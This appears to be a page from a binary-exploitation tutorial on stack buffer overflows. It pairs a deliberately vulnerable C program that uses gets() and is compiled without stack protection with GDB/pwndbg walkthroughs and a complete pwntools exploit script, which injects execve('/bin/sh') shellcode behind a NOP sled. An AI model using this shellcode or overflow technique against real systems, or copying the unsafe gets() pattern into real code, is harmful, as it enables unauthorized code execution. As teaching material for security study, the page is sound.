Executing Shellcode

This section will demonstrate hijacking the execution flow of a program to execute shellcode.

Getting Started

We will be using the following code for the rest of this section:

bof3.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>

int main(int argc, char **argv){
    char buffer[0x100];

    /* Mini ASLR */
    srand(time(NULL));
    fprintf(stderr, "%p\n", buffer + rand() % 0x50);

    gets(buffer);

    return 0;
}

Note: Compile with gcc -o bof3 bof3.c -fno-stack-protector -zexecstack
The compilation flag -fno-stack-protector prevents the compiler from placing stack canaries (integers that detect whether or not a stack-based buffer overflow has occured). The flag -zexecstack disables the NX-bit of the binary which lets us execute shellcode placed on the stack.

You may notice that we no longer have a clear goal like modifying a variable or jumping to a win function.

How can we leverage this vulnerability to create a much more dangerous result like arbitrary code execution?

Debugging with GDB

As our exploits and binaries get more and more complicated, it is important that we have a way to analyze how they work behind the scenes. For this, we will be using a debugger - more specifically the GNU Debugger or GDB. If you are unfamiliar with debuggers, you should read the short introduction and the GDB section here.

Note: Any GDB examples you see run are with the pwndbg gdb extension.

To run our program in gdb, we run the command gdb -q ./bof3. The -q flag stands for “quiet” and just removes the license information that is printed when you launch gdb.

$ gdb -q ./bof3
pwndbg: loaded 172 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./bof3...
(No debugging symbols found in ./bof3)
pwndbg>

Here is a table of common GDB commands that you will see throughout this section:

Command

Description

r / run

run the program

r < exploit

run the program with a file called “exploit” as input

c / continue

continue execution of the program

s / step

execute one line and break; go into function calls

n / next

execute one line and break; do not go into function calls

break *address

stop execution at a specific address

Let’s try running our program in GDB:

pwndbg> r
Starting program: /home/user/bof3 
AAAA
[Inferior 1 (process 18976) exited normally]
pwndbg>

That doesn’t help us much, but we can build on that by setting a breakpoint at the main function. A breakpoint makes your program stop whenever a certain point in the program is reached. To set a breakpoint, you use the format break *address. The break command also takes function names if your binary hasn’t been stripped of its symbols.

pwndbg> break *main
Breakpoint 1 at 0x8049176

Our breakpoint is now set at main’s address which we can verify by using the objdump command:

$ objdump -d bof3 | grep "main.:"
08049176 <main>:

When we run the program, the program’s execution will be stopped when it reaches main’s address.

pwndbg> r
Starting program: /home/user/bof3 

Breakpoint 1, 0x08049176 in main ()

...

 ► 0x8049176 <main>       push   ebp
   0x8049177 <main+1>     mov    ebp, esp
   0x8049179 <main+3>     push   ebx
   0x804917a <main+4>     sub    esp, 0x10
   0x804917d <main+7>     call   __x86.get_pc_thunk.ax <0x804919f>
 
   0x8049182 <main+12>    add    eax, 0x2e7e
   0x8049187 <main+17>    lea    edx, dword ptr [ebp - 0x14]
   0x804918a <main+20>    push   edx
   0x804918b <main+21>    mov    ebx, eax
   0x804918d <main+23>    call   gets@plt <0x8049040>
 
   0x8049192 <main+28>    add    esp, 4

...

Breakpoint *main

Don’t worry too much about pwndbg’s output. It will all make sense in later sections. For now, you should at least be somewhat familiar with registers.

Controlling EIP

If you are not familiar with registers, please visit and reread the Understanding x86 Instructions section.

NOP Sled

Pwntools Exploit

bof3-exploit.py

#!/usr/bin/env python2

from pwn import *

context.log_level = 'debug'
context.update(arch='amd64', os='linux')

shellcode = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e" \
            "\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89" \
            "\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

r = process("./bof3")

payload  = ''
payload += "\x90" * 0x50
payload += shellcode
payload += "\x90" * (0x100+0x8 - len(payload))
payload += p64(int(r.recvline().strip(), 16))

r.sendline(payload)
r.interactive()

PreviousRedirecting Code Execution NextHeap-Based Buffer Overflows

Last updated 6 years ago